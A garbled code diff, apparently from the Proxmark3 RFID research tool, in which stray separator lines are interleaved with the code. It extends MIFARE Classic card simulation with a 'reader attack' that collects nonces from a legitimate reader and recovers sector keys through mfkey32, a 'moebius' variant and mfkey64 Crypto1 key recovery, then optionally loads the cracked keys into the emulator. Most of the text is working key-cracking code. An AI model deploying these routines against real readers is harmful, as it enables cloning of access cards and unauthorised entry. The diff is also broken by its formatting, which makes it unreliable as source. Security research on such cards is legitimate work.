if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK
|
||||||
{
|
{
|
||||||
//May just aswell send the collected ar_nr in the response aswell
|
//Send the collected ar_nr in the response
|
||||||
cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp));
|
cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp));
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -42,14 +42,15 @@ extern int MF_DBGLEVEL;
|
||||||
#define MFEMUL_IDLE 1
|
#define MFEMUL_IDLE 1
|
||||||
#define MFEMUL_SELECT1 2
|
#define MFEMUL_SELECT1 2
|
||||||
#define MFEMUL_SELECT2 3
|
#define MFEMUL_SELECT2 3
|
||||||
#define MFEMUL_AUTH1 4
|
#define MFEMUL_SELECT3 4
|
||||||
#define MFEMUL_AUTH2 5
|
#define MFEMUL_AUTH1 5
|
||||||
#define MFEMUL_WORK 6
|
#define MFEMUL_AUTH2 6
|
||||||
#define MFEMUL_WRITEBL2 7
|
#define MFEMUL_WORK 7
|
||||||
#define MFEMUL_INTREG_INC 8
|
#define MFEMUL_WRITEBL2 8
|
||||||
#define MFEMUL_INTREG_DEC 9
|
#define MFEMUL_INTREG_INC 9
|
||||||
#define MFEMUL_INTREG_REST 10
|
#define MFEMUL_INTREG_DEC 10
|
||||||
#define MFEMUL_HALTED 11
|
#define MFEMUL_INTREG_REST 11
|
||||||
|
#define MFEMUL_HALTED 12
|
||||||
|
|
||||||
#define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF();
|
#define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF();
|
||||||
|
|
||||||
|
|
193
client/cmdhfmf.c
193
client/cmdhfmf.c
|
@ -1016,64 +1016,81 @@ int CmdHF14AMfChk(const char *Cmd)
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
int usage_hf14_mf1ksim(void){
|
||||||
|
PrintAndLog("Usage: hf mf sim [h] u <uid (8,14 hex symbols)> n <numreads> i x");
|
||||||
|
PrintAndLog("options:");
|
||||||
|
PrintAndLog(" h this help");
|
||||||
|
PrintAndLog(" u (Optional) UID 4,7 bytes. If not specified, the UID 4b from emulator memory will be used");
|
||||||
|
PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");
|
||||||
|
PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");
|
||||||
|
PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");
|
||||||
|
PrintAndLog(" e (Optional) set keys found from 'reader attack' to emulator memory");
|
||||||
|
PrintAndLog("samples:");
|
||||||
|
PrintAndLog(" hf mf sim u 0a0a0a0a");
|
||||||
|
PrintAndLog(" hf mf sim u 11223344556677");
|
||||||
|
//PrintAndLog(" hf mf sim u 112233445566778899AA");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
int CmdHF14AMf1kSim(const char *Cmd)
|
int CmdHF14AMf1kSim(const char *Cmd)
|
||||||
{
|
{
|
||||||
uint8_t uid[7] = {0, 0, 0, 0, 0, 0, 0};
|
#define ATTACK_KEY_COUNT 8
|
||||||
|
uint8_t uid[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
|
||||||
uint8_t exitAfterNReads = 0;
|
uint8_t exitAfterNReads = 0;
|
||||||
uint8_t flags = 0;
|
uint8_t flags = 0;
|
||||||
|
int uidlen = 0;
|
||||||
uint8_t cmdp = param_getchar(Cmd, 0);
|
|
||||||
|
|
||||||
if (cmdp == 'h' || cmdp == 'H') {
|
|
||||||
PrintAndLog("Usage: hf mf sim u <uid (8 hex symbols)> n <numreads> i x");
|
|
||||||
PrintAndLog(" h this help");
|
|
||||||
PrintAndLog(" u (Optional) UID. If not specified, the UID from emulator memory will be used");
|
|
||||||
PrintAndLog(" n (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");
|
|
||||||
PrintAndLog(" i (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");
|
|
||||||
PrintAndLog(" x (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");
|
|
||||||
PrintAndLog("");
|
|
||||||
PrintAndLog(" sample: hf mf sim u 0a0a0a0a ");
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
uint8_t pnr = 0;
|
uint8_t pnr = 0;
|
||||||
if (param_getchar(Cmd, pnr) == 'u') {
|
bool setEmulatorMem = false;
|
||||||
if(param_gethex(Cmd, pnr+1, uid, 8) == 0)
|
|
||||||
{
|
char cmdp = param_getchar(Cmd, pnr);
|
||||||
flags |= FLAG_4B_UID_IN_DATA; // UID from packet
|
|
||||||
} else if(param_gethex(Cmd,pnr+1,uid,14) == 0) {
|
if (cmdp == 'h' || cmdp == 'H') return usage_hf14_mf1ksim();
|
||||||
flags |= FLAG_7B_UID_IN_DATA;// UID from packet
|
|
||||||
} else {
|
if (cmdp == 'u' || cmdp == 'U') {
|
||||||
PrintAndLog("UID, if specified, must include 8 or 14 HEX symbols");
|
param_gethex_ex(Cmd, pnr+1, uid, &uidlen);
|
||||||
return 1;
|
switch(uidlen){
|
||||||
|
//case 20: flags = FLAG_10B_UID_IN_DATA; break; //not complete
|
||||||
|
case 14: flags = FLAG_7B_UID_IN_DATA; break;
|
||||||
|
case 8: flags = FLAG_4B_UID_IN_DATA; break;
|
||||||
|
default: return usage_hf14_mf1ksim();
|
||||||
}
|
}
|
||||||
pnr +=2;
|
pnr +=2;
|
||||||
}
|
}
|
||||||
if (param_getchar(Cmd, pnr) == 'n') {
|
|
||||||
exitAfterNReads = param_get8(Cmd,pnr+1);
|
cmdp = param_getchar(Cmd, pnr);
|
||||||
|
if (cmdp == 'n' || cmdp == 'N') {
|
||||||
|
exitAfterNReads = param_get8(Cmd, pnr+1);
|
||||||
pnr += 2;
|
pnr += 2;
|
||||||
}
|
}
|
||||||
if (param_getchar(Cmd, pnr) == 'i' ) {
|
|
||||||
//Using a flag to signal interactiveness, least significant bit
|
cmdp = param_getchar(Cmd, pnr);
|
||||||
|
if (cmdp == 'i' || cmdp == 'I' ) {
|
||||||
flags |= FLAG_INTERACTIVE;
|
flags |= FLAG_INTERACTIVE;
|
||||||
pnr++;
|
pnr++;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (param_getchar(Cmd, pnr) == 'x' ) {
|
cmdp = param_getchar(Cmd, pnr);
|
||||||
//Using a flag to signal interactiveness, least significant bit
|
if (cmdp == 'x' || cmdp == 'X') {
|
||||||
flags |= FLAG_NR_AR_ATTACK;
|
flags |= FLAG_NR_AR_ATTACK;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
cmdp = param_getchar(Cmd, pnr);
|
||||||
|
if (cmdp == 'e' || cmdp == 'E') {
|
||||||
|
setEmulatorMem = true;
|
||||||
|
}
|
||||||
|
|
||||||
PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ",
|
PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ",
|
||||||
flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4):
|
flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4):
|
||||||
flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A"
|
flags & FLAG_7B_UID_IN_DATA ? sprint_hex(uid,7): "N/A"
|
||||||
, exitAfterNReads, flags,flags);
|
, exitAfterNReads, flags,flags);
|
||||||
|
|
||||||
|
|
||||||
UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}};
|
UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}};
|
||||||
memcpy(c.d.asBytes, uid, sizeof(uid));
|
memcpy(c.d.asBytes, uid, sizeof(uid));
|
||||||
|
clearCommandBuffer();
|
||||||
SendCommand(&c);
|
SendCommand(&c);
|
||||||
|
|
||||||
if(flags & FLAG_INTERACTIVE)
|
if(flags & FLAG_INTERACTIVE) {
|
||||||
{
|
|
||||||
UsbCommand resp;
|
UsbCommand resp;
|
||||||
PrintAndLog("Press pm3-button to abort simulation");
|
PrintAndLog("Press pm3-button to abort simulation");
|
||||||
while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) {
|
while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) {
|
||||||
|
@ -1082,61 +1099,79 @@ int CmdHF14AMf1kSim(const char *Cmd)
|
||||||
}
|
}
|
||||||
//got a response
|
//got a response
|
||||||
if (flags & FLAG_NR_AR_ATTACK) {
|
if (flags & FLAG_NR_AR_ATTACK) {
|
||||||
typedef struct {
|
nonces_t ar_resp[ATTACK_KEY_COUNT*2];
|
||||||
uint32_t cuid;
|
|
||||||
uint8_t sector;
|
|
||||||
uint8_t keytype;
|
|
||||||
uint32_t nonce;
|
|
||||||
uint32_t ar;
|
|
||||||
uint32_t nr;
|
|
||||||
uint32_t nonce2;
|
|
||||||
uint32_t ar2;
|
|
||||||
uint32_t nr2;
|
|
||||||
} nonces_t;
|
|
||||||
nonces_t ar_resp[4];
|
|
||||||
//uint32_t ar_responses[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
|
|
||||||
uint64_t key = 0;
|
uint64_t key = 0;
|
||||||
//uint64_t keyB = 0;
|
|
||||||
//uint8_t arnr_len = 8;
|
|
||||||
memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp));
|
memcpy (ar_resp, resp.d.asBytes, sizeof(ar_resp));
|
||||||
|
typedef struct {
|
||||||
for (uint8_t i = 0; i<4; i++) {
|
uint64_t keyA;
|
||||||
|
uint32_t security;
|
||||||
|
uint64_t keyB;
|
||||||
|
} st_t;
|
||||||
|
st_t sector_trailer[ATTACK_KEY_COUNT];
|
||||||
|
memset(sector_trailer, 0x00, sizeof(sector_trailer));
|
||||||
|
|
||||||
|
uint8_t stSector[ATTACK_KEY_COUNT];
|
||||||
|
memset(stSector, 0x00, sizeof(stSector));
|
||||||
|
uint8_t key_cnt[ATTACK_KEY_COUNT];
|
||||||
|
memset(key_cnt, 0x00, sizeof(key_cnt));
|
||||||
|
|
||||||
|
for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {
|
||||||
if (ar_resp[i].ar2 > 0) {
|
if (ar_resp[i].ar2 > 0) {
|
||||||
key = mfkey32(ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);
|
//PrintAndLog("Trying sector %d, cuid %08x, nt %08x, ar %08x, nr %08x, ar2 %08x, nr2 %08x",ar_resp[i].sector, ar_resp[i].cuid,ar_resp[i].nonce,ar_resp[i].ar,ar_resp[i].nr,ar_resp[i].ar2,ar_resp[i].nr2);
|
||||||
if (key>0) {
|
if (mfkey32(ar_resp[i], &key)) {
|
||||||
PrintAndLog("\nFound Key%s for sector %d: [%04x%08x]", (i<2) ? "A" : "B", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));
|
PrintAndLog("Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));
|
||||||
//set emulator memory for key
|
|
||||||
}
|
for (uint8_t ii = 0; ii<ATTACK_KEY_COUNT; ii++) {
|
||||||
}
|
if (key_cnt[ii]==0 || stSector[ii]==ar_resp[i].sector) {
|
||||||
}
|
if (ar_resp[i].keytype==0) {
|
||||||
/*
|
//keyA
|
||||||
if (ar_resp[1] && ar_responses[2] && ar_responses[3] && ar_responses[6] && ar_responses[7]) {
|
sector_trailer[ii].keyA = key;
|
||||||
keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]);
|
stSector[ii] = ar_resp[i].sector;
|
||||||
if (keyA>0) {
|
key_cnt[ii]++;
|
||||||
PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));
|
break;
|
||||||
//set emulator memory for key
|
} else {
|
||||||
} else {
|
//keyB
|
||||||
keyA = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2],ar_responses[3],ar_responses[6],ar_responses[7]);
|
sector_trailer[ii].keyB = key;
|
||||||
if (keyA>0) {
|
stSector[ii] = ar_resp[i].sector;
|
||||||
PrintAndLog("\nFound KeyA: [%04x%08x]\n\n", (uint32_t) (keyA>>32), (uint32_t) (keyA &0xFFFFFFFF));
|
key_cnt[ii]++;
|
||||||
//set emulator memory for key
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
} else {
|
|
||||||
PrintAndLog("keyA response error: %d %d %d %d %d",ar_responses[1] , ar_responses[2] , ar_responses[3] , ar_responses[6] , ar_responses[7]);
|
|
||||||
}
|
}
|
||||||
if (ar_responses[1] && ar_responses[2+arnr_len] && ar_responses[3+arnr_len] && ar_responses[6+arnr_len] && ar_responses[7+arnr_len]) {
|
//set emulator memory for keys
|
||||||
keyB = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2+arnr_len],ar_responses[3+arnr_len],ar_responses[6+arnr_len],ar_responses[7+arnr_len]);
|
if (setEmulatorMem) {
|
||||||
if (keyB>0) {
|
for (uint8_t i = 0; i<ATTACK_KEY_COUNT; i++) {
|
||||||
PrintAndLog("\nFound KeyB: [%04x%08x]\n\n", (uint32_t) (keyB>>32), (uint32_t) (keyB & 0xFFFFFFFF));
|
if (key_cnt[i]>0) {
|
||||||
//set emulator memory for key
|
//PrintAndLog ("block %d, keyA:%04x%08x, keyb:%04x%08x",stSector[i]*4+3, (uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));
|
||||||
|
uint8_t memBlock[16];
|
||||||
|
memset(memBlock, 0x00, sizeof(memBlock));
|
||||||
|
char cmd1[36];
|
||||||
|
memset(cmd1,0x00,sizeof(cmd1));
|
||||||
|
snprintf(cmd1,sizeof(cmd1),"%04x%08xFF078069%04x%08x",(uint32_t) (sector_trailer[i].keyA>>32), (uint32_t) (sector_trailer[i].keyA &0xFFFFFFFF),(uint32_t) (sector_trailer[i].keyB>>32), (uint32_t) (sector_trailer[i].keyB &0xFFFFFFFF));
|
||||||
|
//PrintAndLog("%s",cmd1);
|
||||||
|
if (param_gethex(cmd1, 0, memBlock, 32)) {
|
||||||
|
PrintAndLog("block data must include 32 HEX symbols");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
UsbCommand c = {CMD_MIFARE_EML_MEMSET, {(stSector[i]*4+3), 1, 0}};
|
||||||
|
memcpy(c.d.asBytes, memBlock, 16);
|
||||||
|
clearCommandBuffer();
|
||||||
|
SendCommand(&c);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
if (keyA || keyB) {
|
//moebius attack
|
||||||
//TODO retry sim with new keys in emulator memory? (somehow flag to check that to see if new key has successful auth now?)
|
for (uint8_t i = ATTACK_KEY_COUNT; i<ATTACK_KEY_COUNT*2; i++) {
|
||||||
// to validate key is correct
|
if (ar_resp[i].ar2 > 0) {
|
||||||
|
if (tryMfk32_moebius(ar_resp[i], &key)) {
|
||||||
|
PrintAndLog("M-Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
*/
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -151,22 +151,24 @@ int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_
|
||||||
}
|
}
|
||||||
|
|
||||||
// 32 bit recover key from 2 nonces
|
// 32 bit recover key from 2 nonces
|
||||||
uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc) {
|
bool mfkey32(nonces_t data, uint64_t *outputkey) {
|
||||||
struct Crypto1State *s,*t;
|
struct Crypto1State *s,*t;
|
||||||
|
uint64_t outkey = 0;
|
||||||
uint64_t key=0; // recovered key
|
uint64_t key=0; // recovered key
|
||||||
/*uint32_t uid; // serial number
|
uint32_t uid = data.cuid;
|
||||||
uint32_t nt; // tag challenge
|
uint32_t nt = data.nonce; // first tag challenge (nonce)
|
||||||
uint32_t nr0_enc; // first encrypted reader challenge
|
uint32_t nr0_enc = data.nr; // first encrypted reader challenge
|
||||||
uint32_t ar0_enc; // first encrypted reader response
|
uint32_t ar0_enc = data.ar; // first encrypted reader response
|
||||||
uint32_t nr1_enc; // second encrypted reader challenge
|
uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
|
||||||
uint32_t ar1_enc; // second encrypted reader response
|
uint32_t ar1_enc = data.ar2; // second encrypted reader response
|
||||||
*/
|
clock_t t1 = clock();
|
||||||
uint8_t found=0;
|
bool isSuccess = FALSE;
|
||||||
//uint32_t ks2; // keystream used to encrypt reader response
|
uint8_t counter=0;
|
||||||
|
//PrintAndLog("Enter mfkey32");
|
||||||
|
//PrintAndLog("Trying sector %d, cuid %08x, nt %08x, nr %08x, ar %08x, nr2 %08x, ar2 %08x",data.sector, uid, nt,nr0_enc,ar0_enc,nr1_enc,ar1_enc);
|
||||||
// Generate lfsr succesors of the tag challenge
|
// Generate lfsr succesors of the tag challenge
|
||||||
prng_successor(nt, 64);
|
//prng_successor(nt, 64);
|
||||||
prng_successor(nt, 96);
|
//prng_successor(nt, 96);
|
||||||
|
|
||||||
// Extract the keystream from the messages
|
// Extract the keystream from the messages
|
||||||
//ks2 = ar0_enc ^ prng_successor(nt, 64);
|
//ks2 = ar0_enc ^ prng_successor(nt, 64);
|
||||||
|
@ -181,13 +183,112 @@ uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc,
|
||||||
crypto1_word(t, uid ^ nt, 0);
|
crypto1_word(t, uid ^ nt, 0);
|
||||||
crypto1_word(t, nr1_enc, 1);
|
crypto1_word(t, nr1_enc, 1);
|
||||||
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) {
|
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) {
|
||||||
//printf("\nFound Key: [%012"llx"]\n\n",key);
|
//PrintAndLog("Found Key: [%012"llx"]",key);
|
||||||
found = 1;
|
outkey = key;
|
||||||
break;
|
counter++;
|
||||||
|
if (counter==20) break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
free(s);
|
//free(s);
|
||||||
|
isSuccess = (counter == 1);
|
||||||
|
t1 = clock() - t1;
|
||||||
|
//if ( t1 > 0 ) PrintAndLog("Time in mfkey32: %.0f ticks \nFound %d possible keys", (float)t1, counter);
|
||||||
|
*outputkey = ( isSuccess ) ? outkey : 0;
|
||||||
|
crypto1_destroy(s);
|
||||||
|
FILE *fout;
|
||||||
|
if ((fout = fopen("stats.txt","ab")) == NULL) {
|
||||||
|
PrintAndLog("Could not create file name stats.txt");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
fprintf(fout, "mfkey32,%d,%d,%s,%04x%08x,%.0Lf\r\n",counter,data.sector,(data.keytype) ? "B" : "A", (uint32_t)(outkey>>32) & 0xFFFF,(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
|
||||||
|
fclose(fout);
|
||||||
|
return isSuccess;
|
||||||
|
}
|
||||||
|
|
||||||
if (found) return key;
|
bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey) {
|
||||||
|
struct Crypto1State *s, *t;
|
||||||
|
uint64_t outkey = 0;
|
||||||
|
uint64_t key = 0; // recovered key
|
||||||
|
uint32_t uid = data.cuid;
|
||||||
|
uint32_t nt0 = data.nonce; // first tag challenge (nonce)
|
||||||
|
uint32_t nr0_enc = data.nr; // first encrypted reader challenge
|
||||||
|
uint32_t ar0_enc = data.ar; // first encrypted reader response
|
||||||
|
//uint32_t uid1 = le32toh(data+16);
|
||||||
|
uint32_t nt1 = data.nonce2; // second tag challenge (nonce)
|
||||||
|
uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
|
||||||
|
uint32_t ar1_enc = data.ar2; // second encrypted reader response
|
||||||
|
bool isSuccess = FALSE;
|
||||||
|
int counter = 0;
|
||||||
|
|
||||||
|
//PrintAndLog("Enter mfkey32_moebius");
|
||||||
|
clock_t t1 = clock();
|
||||||
|
|
||||||
|
s = lfsr_recovery32(ar0_enc ^ prng_successor(nt0, 64), 0);
|
||||||
|
|
||||||
|
for(t = s; t->odd | t->even; ++t) {
|
||||||
|
lfsr_rollback_word(t, 0, 0);
|
||||||
|
lfsr_rollback_word(t, nr0_enc, 1);
|
||||||
|
lfsr_rollback_word(t, uid ^ nt0, 0);
|
||||||
|
crypto1_get_lfsr(t, &key);
|
||||||
|
|
||||||
|
crypto1_word(t, uid ^ nt1, 0);
|
||||||
|
crypto1_word(t, nr1_enc, 1);
|
||||||
|
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt1, 64))) {
|
||||||
|
//PrintAndLog("Found Key: [%012"llx"]",key);
|
||||||
|
outkey=key;
|
||||||
|
++counter;
|
||||||
|
if (counter==20)
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
isSuccess = (counter == 1);
|
||||||
|
t1 = clock() - t1;
|
||||||
|
//if ( t1 > 0 ) PrintAndLog("Time in mfkey32_moebius: %.0f ticks \nFound %d possible keys", (float)t1,counter);
|
||||||
|
*outputkey = ( isSuccess ) ? outkey : 0;
|
||||||
|
crypto1_destroy(s);
|
||||||
|
FILE *fout;
|
||||||
|
if ((fout = fopen("stats.txt","ab")) == NULL) {
|
||||||
|
PrintAndLog("Could not create file name stats.txt");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
fprintf(fout, "moebius,%d,%d,%s,%04x%08x,%0.Lf\r\n",counter,data.sector, (data.keytype) ? "B" : "A", (uint32_t) (outkey>>32),(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
|
||||||
|
fclose(fout);
|
||||||
|
return isSuccess;
|
||||||
|
}
|
||||||
|
|
||||||
|
int tryMfk64_ex(uint8_t *data, uint64_t *outputkey){
|
||||||
|
uint32_t uid = le32toh(data);
|
||||||
|
uint32_t nt = le32toh(data+4); // tag challenge
|
||||||
|
uint32_t nr_enc = le32toh(data+8); // encrypted reader challenge
|
||||||
|
uint32_t ar_enc = le32toh(data+12); // encrypted reader response
|
||||||
|
uint32_t at_enc = le32toh(data+16); // encrypted tag response
|
||||||
|
return tryMfk64(uid, nt, nr_enc, ar_enc, at_enc, outputkey);
|
||||||
|
}
|
||||||
|
|
||||||
|
int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey){
|
||||||
|
uint64_t key = 0; // recovered key
|
||||||
|
uint32_t ks2; // keystream used to encrypt reader response
|
||||||
|
uint32_t ks3; // keystream used to encrypt tag response
|
||||||
|
struct Crypto1State *revstate;
|
||||||
|
|
||||||
|
PrintAndLog("Enter mfkey64");
|
||||||
|
clock_t t1 = clock();
|
||||||
|
|
||||||
|
// Extract the keystream from the messages
|
||||||
|
ks2 = ar_enc ^ prng_successor(nt, 64);
|
||||||
|
ks3 = at_enc ^ prng_successor(nt, 96);
|
||||||
|
revstate = lfsr_recovery64(ks2, ks3);
|
||||||
|
lfsr_rollback_word(revstate, 0, 0);
|
||||||
|
lfsr_rollback_word(revstate, 0, 0);
|
||||||
|
lfsr_rollback_word(revstate, nr_enc, 1);
|
||||||
|
lfsr_rollback_word(revstate, uid ^ nt, 0);
|
||||||
|
crypto1_get_lfsr(revstate, &key);
|
||||||
|
PrintAndLog("Found Key: [%012"llx"]", key);
|
||||||
|
crypto1_destroy(revstate);
|
||||||
|
*outputkey = key;
|
||||||
|
|
||||||
|
t1 = clock() - t1;
|
||||||
|
if ( t1 > 0 ) PrintAndLog("Time in mfkey64: %.0f ticks \n", (float)t1);
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -17,8 +17,26 @@
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
#include "crapto1.h"
|
#include "crapto1.h"
|
||||||
#include "common.h"
|
#include "common.h"
|
||||||
|
//#include <stdbool.h> //for bool
|
||||||
|
|
||||||
|
typedef struct {
|
||||||
|
uint32_t cuid;
|
||||||
|
uint8_t sector;
|
||||||
|
uint8_t keytype;
|
||||||
|
uint32_t nonce;
|
||||||
|
uint32_t ar;
|
||||||
|
uint32_t nr;
|
||||||
|
uint32_t nonce2;
|
||||||
|
uint32_t ar2;
|
||||||
|
uint32_t nr2;
|
||||||
|
} nonces_t;
|
||||||
|
|
||||||
int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key);
|
int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key);
|
||||||
uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
|
bool mfkey32(nonces_t data, uint64_t *outputkey);
|
||||||
|
bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey);
|
||||||
|
int tryMfk64_ex(uint8_t *data, uint64_t *outputkey);
|
||||||
|
int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey);
|
||||||
|
|
||||||
|
//uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
|
@ -498,6 +498,9 @@ void xor(unsigned char *dst, unsigned char *src, size_t len) {
|
||||||
int32_t le24toh (uint8_t data[3]) {
|
int32_t le24toh (uint8_t data[3]) {
|
||||||
return (data[2] << 16) | (data[1] << 8) | data[0];
|
return (data[2] << 16) | (data[1] << 8) | data[0];
|
||||||
}
|
}
|
||||||
|
uint32_t le32toh (uint8_t *data) {
|
||||||
|
return (uint32_t)( (data[3]<<24) | (data[2]<<16) | (data[1]<<8) | data[0]);
|
||||||
|
}
|
||||||
|
|
||||||
// RotateLeft - Ultralight, Desfire, works on byte level
|
// RotateLeft - Ultralight, Desfire, works on byte level
|
||||||
// 00-01-02 >> 01-02-00
|
// 00-01-02 >> 01-02-00
|
||||||
|
|
|
@ -70,4 +70,5 @@ void wiegand_add_parity(uint8_t *target, uint8_t *source, uint8_t length);
|
||||||
|
|
||||||
void xor(unsigned char *dst, unsigned char *src, size_t len);
|
void xor(unsigned char *dst, unsigned char *src, size_t len);
|
||||||
int32_t le24toh(uint8_t data[3]);
|
int32_t le24toh(uint8_t data[3]);
|
||||||
|
uint32_t le32toh (uint8_t *data);
|
||||||
void rol(uint8_t *data, const size_t len);
|
void rol(uint8_t *data, const size_t len);
|
||||||
|
|
|
@ -109,20 +109,25 @@ NXP/Philips CUSTOM COMMANDS
|
||||||
#define ISO14443A_CMD_WUPA 0x52
|
#define ISO14443A_CMD_WUPA 0x52
|
||||||
#define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93
|
#define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93
|
||||||
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95
|
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95
|
||||||
|
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_3 0x97
|
||||||
#define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ?
|
#define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ?
|
||||||
#define ISO14443A_CMD_HALT 0x50
|
#define ISO14443A_CMD_HALT 0x50
|
||||||
#define ISO14443A_CMD_RATS 0xE0
|
#define ISO14443A_CMD_RATS 0xE0
|
||||||
|
|
||||||
#define MIFARE_AUTH_KEYA 0x60
|
#define MIFARE_AUTH_KEYA 0x60
|
||||||
#define MIFARE_AUTH_KEYB 0x61
|
#define MIFARE_AUTH_KEYB 0x61
|
||||||
#define MIFARE_MAGICWUPC1 0x40
|
#define MIFARE_MAGICWUPC1 0x40
|
||||||
#define MIFARE_MAGICWUPC2 0x43
|
#define MIFARE_MAGICWUPC2 0x43
|
||||||
#define MIFARE_MAGICWIPEC 0x41
|
#define MIFARE_MAGICWIPEC 0x41
|
||||||
#define MIFARE_CMD_INC 0xC0
|
#define MIFARE_CMD_INC 0xC0
|
||||||
#define MIFARE_CMD_DEC 0xC1
|
#define MIFARE_CMD_DEC 0xC1
|
||||||
#define MIFARE_CMD_RESTORE 0xC2
|
#define MIFARE_CMD_RESTORE 0xC2
|
||||||
#define MIFARE_CMD_TRANSFER 0xB0
|
#define MIFARE_CMD_TRANSFER 0xB0
|
||||||
|
|
||||||
|
#define MIFARE_EV1_PERSONAL_UID 0x40
|
||||||
|
#define MIFARE_EV1_SETMODE 0x43
|
||||||
|
|
||||||
|
|
||||||
#define MIFARE_ULC_WRITE 0xA2
|
#define MIFARE_ULC_WRITE 0xA2
|
||||||
